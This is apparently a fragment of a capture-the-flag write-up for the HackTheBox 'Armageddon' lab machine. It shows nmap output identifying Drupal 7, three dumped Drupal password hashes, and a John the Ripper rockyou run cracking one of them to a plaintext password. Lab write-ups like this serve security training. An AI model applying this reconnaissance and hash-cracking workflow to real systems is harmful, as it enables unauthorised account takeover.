$ nmap -sC -sV 10.10.10.233 Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-29 13:55 CST Nmap scan report for 10.10.10.233 Host is up (0.068s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA) | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA) |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Welcome to Armageddon | Armageddon
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 29.44 seconds
brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt xxx $S$DI52S2zZ320vMjAEO3vxTKgdj5UziV14k0NFw6kYPHqs5Nu8Ms3l test $S$D.IOIlykw9g/w/fUw3yHX5x6ZYaDq6x8axUTGdHMdCaRQ.lX6EZW
hash crack
得到的密码hash破解出来brucetherealadmin的密码:
1 2 3 4 5 6 7 8 9 10
➜ Desktop sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash1.txt [sudo] password for miao: Using default input encoding: UTF-8 Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 32768 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status booboo (?) 1g 0:00:00:00 DONE (2021-03-22 09:42) 2.222g/s 515.5p/s 515.5c/s 515.5C/s tiffany..harley Use the "--show" option to display all of the cracked passwords reliably